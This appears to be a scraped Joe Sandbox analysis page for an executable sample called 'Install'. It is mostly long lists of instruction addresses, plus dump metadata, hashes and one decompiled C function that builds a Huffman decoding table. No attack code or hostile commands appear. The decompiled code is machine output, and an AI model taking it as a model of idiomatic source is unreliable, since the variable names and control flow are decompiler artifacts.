                            0x004070bb
                            0x004070be
                            0x00000000
                            0x00000000
                            0x004070c4
                            0x004070c4
                            0x004070e9
                            0x004070e9
                            0x004070e9
                            0x004070eb
                            0x00000000
                            0x00000000
                            0x004070c9
                            0x004070c9
                            0x004070cd
                            0x00000000
                            0x00000000
                            0x004070d3
                            0x004070d3
                            0x004070d6
                            0x004070d9
                            0x004070dc
                            0x004070de
                            0x004070e0
                            0x004070e3
                            0x004070e6
                            0x004070e6
                            0x004070e6
                            0x004070ed
                            0x004070ed
                            0x004070f5
                            0x004070f8
                            0x004070fb
                            0x004070fe
                            0x00407102
                            0x00407105
                            0x00407107
                            0x0040710a
                            0x0040710c
                            0x00407120
                            0x00407120
                            0x00407123
                            0x0040713d
                            0x0040713d
                            0x00407140
                            0x00000000
                            0x00000000
                            0x00407146
                            0x00407146
                            0x00407149
                            0x00000000
                            0x00000000
                            0x0040714f
                            0x0040714f
                            0x00000000
                            0x0040714f
                            0x00407125
                            0x00407128
                            0x0040712f
                            0x00407132
                            0x00000000
                            0x00407132
                            0x0040710e
                            0x00407112
                            0x00407115
                            0x00000000
                            0x00000000
                            0x0040715a
                            0x0040715a
                            0x0040717f
                            0x0040717f
                            0x0040717f
                            0x00407181
                            0x00000000
                            0x00000000
                            0x0040715f
                            0x0040715f
                            0x00407163
                            0x00000000
                            0x00000000
                            0x00407169
                            0x00407169
                            0x0040716c
                            0x0040716f
                            0x00407172
                            0x00407174
                            0x00407176
                            0x00407179
                            0x0040717c
                            0x0040717c
                            0x0040717c
                            0x00407183
                            0x0040718b
                            0x0040718e
                            0x00407191
                            0x00407193
                            0x00407196
                            0x00407196
                            0x00407198
                            0x0040719c
                            0x0040719f
                            0x004071a2
                            0x004071a5
                            0x00000000
                            0x00000000
                            0x004071ab
                            0x004071ab
                            0x004071d0
                            0x004071d0
                            0x004071d0
                            0x004071d2
                            0x00000000
                            0x00000000
                            0x004071b0
                            0x004071b0
                            0x004071b4
                            0x00000000
                            0x00000000
                            0x004071ba
                            0x004071ba
                            0x004071bd
                            0x004071c0
                            0x004071c3
                            0x004071c5
                            0x004071c7
                            0x004071ca
                            0x004071cd
                            0x004071cd
                            0x004071cd
                            0x004071d4
                            0x004071d4
                            0x004071dc
                            0x004071df
                            0x004071e2
                            0x004071e5
                            0x004071e9
                            0x004071ec
                            0x004071ee
                            0x004071f1
                            0x004071f4
                            0x0040720e
                            0x0040720e
                            0x00407211
                            0x00000000
                            0x00000000
                            0x00407217
                            0x00407217
                            0x0040721a
                            0x00407221
                            0x00000000
                            0x00407221
                            0x004071f6
                            0x004071f9
                            0x00407200
                            0x00407203
                            0x00000000
                            0x00000000
                            0x00407229
                            0x00407229
                            0x0040724e
                            0x0040724e
                            0x0040724e
                            0x00407250
                            0x00000000
                            0x00000000
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x00000000
                            0x00000000
                            0x00407238
                            0x00407238
                            0x0040723b
                            0x0040723e
                            0x00407241
                            0x00407243
                            0x00407245
                            0x00407248
                            0x0040724b
                            0x0040724b
                            0x0040724b
                            0x00407252
                            0x0040725a
                            0x0040725d
                            0x00407260
                            0x00407262
                            0x00407265
                            0x00407265
                            0x00407267
                            0x00000000
                            0x00000000
                            0x0040726d
                            0x0040726d
                            0x00407270
                            0x00407275
                            0x00407277
                            0x0040727d
                            0x0040727f
                            0x00407294
                            0x00407296
                            0x00407296
                            0x00407281
                            0x00407287
                            0x00407289
                            0x0040728b
                            0x0040728b
                            0x00407298
                            0x0040729c
                            0x0040729f
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x004072a8
                            0x004072a8
                            0x004072aa
                            0x00000000
                            0x00000000
                            0x004072b0
                            0x004072b0
                            0x004072b6
                            0x004072b8
                            0x004072dd
                            0x004072e0
                            0x004072e6
                            0x004072eb
                            0x004072f1
                            0x004072f7
                            0x004072f9
                            0x004072fc
                            0x00407305
                            0x0040730b
                            0x0040730b
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407302
                            0x0040730d
                            0x00407313
                            0x00407315
                            0x00407318
                            0x0040731a
                            0x00407320
                            0x00407322
                            0x00407324
                            0x00407326
                            0x00407328
                            0x0040732b
                            0x00407334
                            0x00407337
                            0x00407337
                            0x0040732d
                            0x0040732d
                            0x00407330
                            0x00407330
                            0x0040732b
                            0x00407322
                            0x00407339
                            0x0040733b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040733b
                            0x004072ba
                            0x004072ba
                            0x004072c0
                            0x004072c6
                            0x004072c8
                            0x00000000
                            0x00000000
                            0x004072ca
                            0x004072ca
                            0x004072cc
                            0x004072ce
                            0x004072d7
                            0x004072d7
                            0x004072d0
                            0x004072d0
                            0x004072d3
                            0x004072d3
                            0x004072d9
                            0x004072db
                            0x00000000
                            0x00000000
                            0x00407341
                            0x00407341
                            0x00407346
                            0x00407348
                            0x00407349
                            0x0040734a
                            0x0040734b
                            0x00407351
                            0x00407354
                            0x00407357
                            0x0040735a
                            0x0040735c
                            0x00407362
                            0x00407362
                            0x00407365
                            0x00407365
                            0x00407365
                            0x00407365
                            0x0040736e
                            0x00000000
                            0x00000000
                            0x00407373
                            0x00407373
                            0x00407376
                            0x00407379
                            0x0040737b
                            0x00407412
                            0x00407412
                            0x00407415
                            0x00407417
                            0x00407418
                            0x00407419
                            0x0040741c
                            0x00000000
                            0x0040741c
                            0x00407381
                            0x00407381
                            0x00407387
                            0x00407389
                            0x004073ae
                            0x004073b1
                            0x004073b7
                            0x004073bc
                            0x004073c2
                            0x004073c8
                            0x004073ca
                            0x004073cd
                            0x004073d6
                            0x004073dc
                            0x004073dc
                            0x004073cf
                            0x004073d1
                            0x004073d3
                            0x004073d3
                            0x004073de
                            0x004073e4
                            0x004073e6
                            0x004073e9
                            0x004073eb
                            0x004073f1
                            0x004073f3
                            0x004073f5
                            0x004073f7
                            0x004073f9
                            0x004073fc
                            0x00407405
                            0x00407408
                            0x00407408
                            0x004073fe
                            0x004073fe
                            0x00407401
                            0x00407401
                            0x004073fc
                            0x004073f3
                            0x0040740a
                            0x0040740c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040740c
                            0x0040738b
                            0x0040738b
                            0x00407391
                            0x00407397
                            0x00407399
                            0x00000000
                            0x00000000
                            0x0040739b
                            0x0040739b
                            0x0040739d
                            0x0040739f
                            0x004073a6
                            0x004073a6
                            0x004073a8
                            0x004073a1
                            0x004073a1
                            0x004073a3
                            0x004073a3
                            0x004073aa
                            0x004073ac
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407424
                            0x00407424
                            0x00407427
                            0x00407429
                            0x0040742c
                            0x0040742f
                            0x0040742f
                            0x0040742f
                            0x0040742f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406add
                            0x00406ac1
                            0x00000000
                            0x00406ac7
                            0x00406aca
                            0x00406ad4
                            0x00406ad7
                            0x00406ada
                            0x00000000
                            0x00406ada
                            0x00406ac1
                            0x00406ae5
                            0x00406ae8
                            0x00406aec
                            0x00406af6
                            0x00406b00
                            0x00406b03
                            0x00406b09
                            0x00406c3d
                            0x00406c3f
                            0x00406c45
                            0x00406c48
                            0x00406c4b
                            0x00000000
                            0x00406c4b
                            0x00406b0f
                            0x00406b0f
                            0x00406b10
                            0x00406b68
                            0x00406b68
                            0x00406b6f
                            0x00406c15
                            0x00406c15
                            0x00406c1a
                            0x00406c1d
                            0x00406c22
                            0x00406c25
                            0x00406c2a
                            0x00406c2d
                            0x00406c32
                            0x00406c35
                            0x00406c35
                            0x00000000
                            0x00406b75
                            0x00406b75
                            0x00406b75
                            0x00406b75
                            0x00406b79
                            0x00406b79
                            0x00406b9b
                            0x00406b9e
                            0x00406ba0
                            0x00406ba3
                            0x00406ba8
                            0x00406b7e
                            0x00406b7e
                            0x00406b83
                            0x00406b85
                            0x00406b87
                            0x00406b8c
                            0x00406b92
                            0x00406b97
                            0x00406b99
                            0x00406b99
                            0x00406b8e
                            0x00406b8e
                            0x00406b8e
                            0x00406b8c
                            0x00000000
                            0x00406baa
                            0x00406bd7
                            0x00406bdc
                            0x00406bde
                            0x00406bdf
                            0x00406be1
                            0x00406be2
                            0x00406be2
                            0x00406be2
                            0x00406c0a
                            0x00406c0f
                            0x00406c0f
                            0x00000000
                            0x00406c0f
                            0x00406ba8
                            0x00406b6f
                            0x00406b12
                            0x00406b12
                            0x00406b13
                            0x00406b5d
                            0x00000000
                            0x00406b5d
                            0x00406b15
                            0x00406b16
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c72
                            0x00406c72
                            0x00406c72
                            0x00406c75
                            0x00000000
                            0x00000000
                            0x00406c52
                            0x00406c52
                            0x00406c56
                            0x00000000
                            0x00000000
                            0x00406c5c
                            0x00406c5c
                            0x00406c5f
                            0x00406c62
                            0x00406c67
                            0x00406c69
                            0x00406c6c
                            0x00406c6f
                            0x00406c6f
                            0x00406c6f
                            0x00406c77
                            0x00406c77
                            0x00406c7a
                            0x00406c7c
                            0x00406c81
                            0x00406c84
                            0x00406c86
                            0x00406c89
                            0x00000000
                            0x00000000
                            0x00406c8f
                            0x00406c8f
                            0x00406c91
                            0x00000000
                            0x00000000
                            0x00406c97
                            0x00406c97
                            0x00406c9b
                            0x00000000
                            0x00000000
                            0x00406ca1
                            0x00406ca1
                            0x00406ca4
                            0x00406ca6
                            0x00406d44
                            0x00406d44
                            0x00406d47
                            0x00406d49
                            0x00406d49
                            0x00406d4c
                            0x00406d4f
                            0x00406d51
                            0x00406d53
                            0x00406d55
                            0x00406d55
                            0x00406d5e
                            0x00406d63
                            0x00406d66
                            0x00406d69
                            0x00406d6c
                            0x00406d6f
                            0x00406d6f
                            0x00406d6f
                            0x00406d72
                            0x00406d78
                            0x00406d78
                            0x00406d7e
                            0x00406d7e
                            0x00406d7e
                            0x00000000
                            0x00406d72
                            0x00406cac
                            0x00406cac
                            0x00406cb2
                            0x00406cb5
                            0x00406cb7
                            0x00406ce2
                            0x00406ce5
                            0x00406ceb
                            0x00406cf0
                            0x00406cf6
                            0x00406cfc
                            0x00406cfe
                            0x00406d01
                            0x00406d0a
                            0x00406d10
                            0x00406d10
                            0x00406d03
                            0x00406d05
                            0x00406d07
                            0x00406d07
                            0x00406d12
                            0x00406d18
                            0x00406d1b
                            0x00406d1d
                            0x00406d1f
                            0x00406d25
                            0x00406d27
                            0x00406d29
                            0x00406d2c
                            0x00406d35
                            0x00406d35
                            0x00406d37
                            0x00406d2e
                            0x00406d2e
                            0x00406d31
                            0x00406d31
                            0x00406d39
                            0x00406d39
                            0x00406d27
                            0x00406d3c
                            0x00406d3e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d3e
                            0x00406cb9
                            0x00406cb9
                            0x00406cbf
                            0x00406cc5
                            0x00406cc7
                            0x00000000
                            0x00000000
                            0x00406cc9
                            0x00406cc9
                            0x00406ccb
                            0x00406ccd
                            0x00406cd0
                            0x00406cd7
                            0x00406cd7
                            0x00406cd9
                            0x00406cd2
                            0x00406cd2
                            0x00406cd4
                            0x00406cd4
                            0x00406cdb
                            0x00406cdd
                            0x00406ce0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406de4
                            0x00406de7
                            0x00406dea
                            0x00406df0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406fc7
                            0x00406fc7
                            0x00406fc7
                            0x00406fca
                            0x00406fcd
                            0x00406fcf
                            0x00406fd2
                            0x00406fd8
                            0x00406fdf
                            0x00406fe1
                            0x00000000
                            0x00000000
                            0x00406eb5
                            0x00406eb5
                            0x00406edd
                            0x00406edd
                            0x00406edd
                            0x00406edf
                            0x00000000
                            0x00000000
                            0x00406ebd
                            0x00406ebd
                            0x00406ec1
                            0x00000000
                            0x00000000
                            0x00406ec7
                            0x00406ec7
                            0x00406eca
                            0x00406ecd
                            0x00406ed0
                            0x00406ed2
                            0x00406ed4
                            0x00406ed7
                            0x00406eda
                            0x00406eda
                            0x00406eda
                            0x00406ee1
                            0x00406ee1
                            0x00406ee9
                            0x00406eec
                            0x00406ef2
                            0x00406ef5
                            0x00406ef9
                            0x00406efd
                            0x00406f00
                            0x00406f03
                            0x00406f1b
                            0x00406f1b
                            0x00406f1e
                            0x00406f2c
                            0x00406f2f
                            0x00406f20
                            0x00406f20
                            0x00406f22
                            0x00406f29
                            0x00406f29
                            0x00406f58
                            0x00406f58
                            0x00406f58
                            0x00406f5b
                            0x00406f5d
                            0x00000000
                            0x00000000
                            0x00406f38
                            0x00406f38
                            0x00406f3c
                            0x00000000
                            0x00000000
                            0x00406f42
                            0x00406f42
                            0x00406f45
                            0x00406f48
                            0x00406f4b
                            0x00406f4d
                            0x00406f4f
                            0x00406f52
                            0x00406f55
                            0x00406f55
                            0x00406f55
                            0x00406f5f
                            0x00406f5f
                            0x00406f61
                            0x00406f63
                            0x00406f6e
                            0x00406f71
                            0x00406f74
                            0x00406f76
                            0x00406f78
                            0x00406f7a
                            0x00406f7d
                            0x00406f80
                            0x00406f85
                            0x00406f88
                            0x00406f8b
                            0x00406f8e
                            0x00406f95
                            0x00406f98
                            0x00406f9a
                            0x00000000
                            0x00000000
                            0x00406fa0
                            0x00406fa0
                            0x00406fa4
                            0x00406fb5
                            0x00406fb5
                            0x00406fb5
                            0x00406fb7
                            0x00406fb7
                            0x00406fbb
                            0x00406fbb
                            0x00406fbb
                            0x00406fbd
                            0x00406fbe
                            0x00406fc1
                            0x00406fc1
                            0x00406fc1
                            0x00406fc4
                            0x00000000
                            0x00406fc4
                            0x00406fa6
                            0x00406fa6
                            0x00406fa9
                            0x00000000
                            0x00000000
                            0x00406faf
                            0x00406faf
                            0x00000000
                            0x00406faf
                            0x00406f05
                            0x00406f05
                            0x00406f07
                            0x00406f09
                            0x00406f0c
                            0x00406f0f
                            0x00406f13
                            0x00406f13
                            0x00406fe7
                            0x00406fe7
                            0x00406fea
                            0x00406ff1
                            0x00406ff5
                            0x00406ff7
                            0x00406ffa
                            0x00406ffd
                            0x00407002
                            0x00407005
                            0x00407007
                            0x00407008
                            0x0040700b
                            0x00407016
                            0x00407019
                            0x00407030
                            0x00407035
                            0x0040703c
                            0x00407041
                            0x00407045
                            0x00407047
                            0x00407047
                            0x00407047
                            0x0040704a
                            0x0040704c
                            0x00000000
                            0x00407052
                            0x00407052
                            0x00407056
                            0x00407061
                            0x00407074
                            0x00407079
                            0x0040707e
                            0x00407080
                            0x00000000
                            0x00000000
                            0x00407086
                            0x00407086
                            0x00407089
                            0x0040708b
                            0x00407099
                            0x00407099
                            0x0040709c
                            0x0040709c
                            0x0040709f
                            0x004070a2
                            0x004070a5
                            0x004070a8
                            0x004070ab
                            0x004070ae
                            0x00000000
                            0x004070ae
                            0x0040708d
                            0x0040708d
                            0x00407093
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407093
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407432
                            0x00407432
                            0x00407438
                            0x0040743e
                            0x00407443
                            0x00407449
                            0x0040744f
                            0x00407451
                            0x00407454
                            0x0040745d
                            0x00407463
                            0x00407463
                            0x00407456
                            0x00407458
                            0x0040745a
                            0x0040745a
                            0x00407465
                            0x00407467
                            0x0040746a
                            0x004074a5
                            0x004074a5
                            0x00000000
                            0x0040746c
                            0x0040746c
                            0x0040746c
                            0x00407472
                            0x00407475
                            0x00407477
                            0x004074ac
                            0x004074ae
                            0x00000000
                            0x004074ae
                            0x00000000
                            0x00407477
                            0x00000000
                            0x00406ab6
                            0x00407484
                            0x00000000
                            0x00407484
                            0x00406e98
                            0x00406e9a
                            0x00000000
                            0x00000000
                            0x00406e9c
                            0x00406e9c
                            0x00406e9f
                            0x00000000
                            0x00406e9f
                            0x00406de4
                            0x00406da5
                            0x00407489
                            0x0040748c
                            0x0040748e
                            0x00407497
                            0x0040749d
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                            • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                            • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                            • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040755C Relevance: .3, Instructions: 300COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                            0x00407567
                            0x0040756f
                            0x00407573
                            0x00407575
                            0x00407578
                            0x0040757a
                            0x0040757a
                            0x0040757c
                            0x00407583
                            0x00407585
                            0x00407585
                            0x0040758b
                            0x004075a0
                            0x004075a8
                            0x004075aa
                            0x004075ac
                            0x004075af
                            0x004075b0
                            0x004075b0
                            0x004075b6
                            0x00000000
                            0x00000000
                            0x004075b8
                            0x004075bb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004075bb
                            0x004075bf
                            0x004075c2
                            0x004075c4
                            0x004075c4
                            0x004075c7
                            0x004075cd
                            0x004075ce
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004075ce
                            0x004075d3
                            0x004075d6
                            0x004075d8
                            0x004075d8
                            0x004075de
                            0x004075e0
                            0x004075f1
                            0x004075e4
                            0x004075e8
                            0x0040788d
                            0x00000000
                            0x0040788d
                            0x004075ee
                            0x004075ef
                            0x004075ef
                            0x004075f7
                            0x004075fa
                            0x004075fe
                            0x00407600
                            0x00407602
                            0x00407605
                            0x00000000
                            0x00000000
                            0x0040760d
                            0x00407613
                            0x00407615
                            0x00407617
                            0x00407618
                            0x0040762d
                            0x0040762d
                            0x00407630
                            0x00407632
                            0x00407632
                            0x00407634
                            0x00407639
                            0x0040763b
                            0x00407642
                            0x00407644
                            0x0040764c
                            0x0040764c
                            0x0040764e
                            0x0040764f
                            0x0040765e
                            0x00407662
                            0x00407666
                            0x00407669
                            0x0040766c
                            0x00407671
                            0x00407674
                            0x0040767a
                            0x00407681
                            0x00407687
                            0x00407880
                            0x00407880
                            0x00407885
                            0x00407894
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407885
                            0x00407694
                            0x00407697
                            0x0040769a
                            0x0040769d
                            0x004076a1
                            0x00000000
                            0x00000000
                            0x004076ac
                            0x004076af
                            0x004076b0
                            0x004076b2
                            0x004076b8
                            0x004076bb
                            0x00000000
                            0x00000000
                            0x004076c1
                            0x004076c2
                            0x004076c5
                            0x004076c8
                            0x004076cb
                            0x004076d1
                            0x004076d3
                            0x004076d3
                            0x004076db
                            0x004076df
                            0x004076e4
                            0x00407709
                            0x0040770f
                            0x00407711
                            0x00407713
                            0x00407716
                            0x0040771f
                            0x00000000
                            0x00000000
                            0x004076e6
                            0x004076e6
                            0x004076ef
                            0x004076f3
                            0x00000000
                            0x00000000
                            0x00407704
                            0x00407704
                            0x00407707
                            0x00000000
                            0x00000000
                            0x004076f7
                            0x004076fa
                            0x004076fc
                            0x00407700
                            0x00000000
                            0x00000000
                            0x00407702
                            0x00407702
                            0x00000000
                            0x00407704
                            0x00407728
                            0x0040772e
                            0x00407738
                            0x0040773a
                            0x0040773f
                            0x00407741
                            0x00407777
                            0x00407743
                            0x00407743
                            0x00407746
                            0x00407749
                            0x00407753
                            0x00407756
                            0x0040775d
                            0x00407768
                            0x0040776f
                            0x0040776f
                            0x00407779
                            0x0040777c
                            0x0040777e
                            0x00407784
                            0x00407784
                            0x0040778d
                            0x00407790
                            0x00407795
                            0x004077a4
                            0x004077ac
                            0x004077b1
                            0x004077d5
                            0x004077dd
                            0x004077e1
                            0x004077e7
                            0x004077b3
                            0x004077c1
                            0x004077c4
                            0x004077ca
                            0x004077ca
                            0x004077eb
                            0x004077a6
                            0x004077a6
                            0x004077a6
                            0x004077fc
                            0x00407800
                            0x0040780c
                            0x00407807
                            0x0040780a
                            0x0040780a
                            0x00407814
                            0x00407819
                            0x00407821
                            0x0040781d
                            0x0040781f
                            0x0040781f
                            0x00407827
                            0x00407829
                            0x00407830
                            0x0040783a
                            0x00407844
                            0x00407860
                            0x00407864
                            0x004076a9
                            0x004076af
                            0x004076b0
                            0x004076b2
                            0x004076b8
                            0x004076bb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004076bb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407846
                            0x00407846
                            0x00407846
                            0x0040784b
